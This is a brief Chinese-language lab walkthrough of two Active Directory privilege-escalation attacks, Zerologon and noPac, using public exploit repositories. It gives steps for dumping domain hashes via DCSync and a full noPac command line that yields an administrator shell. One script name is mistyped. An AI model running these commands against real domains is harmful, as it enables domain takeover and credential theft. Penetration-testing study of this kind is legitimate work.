历史漏洞的利用

因为脆弱的密码学设计，攻击者可以绕过认证并模仿任何域主机，包括域控制器，以实现提权。这里，我们使用来自 https://github.com/dirkjanm/CVE-2020-1472 的exp。

1：运行 cve-2022-1472-exploit.py 脚本，我们需要提供DC的IP以及netbios名

2：之后，使用impacket中的secretdump.py 脚本，加上 -just-dc 以及 -no-pass 参数，通过DCSync导出哈希。

该漏洞实际上利用了主机账号的伪造，攻击者可以从普通用户提升为域管理员。这里，我们使用来自 https://github.com/Ridter/noPac 的exp。

1：使用exp一键拿shell python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator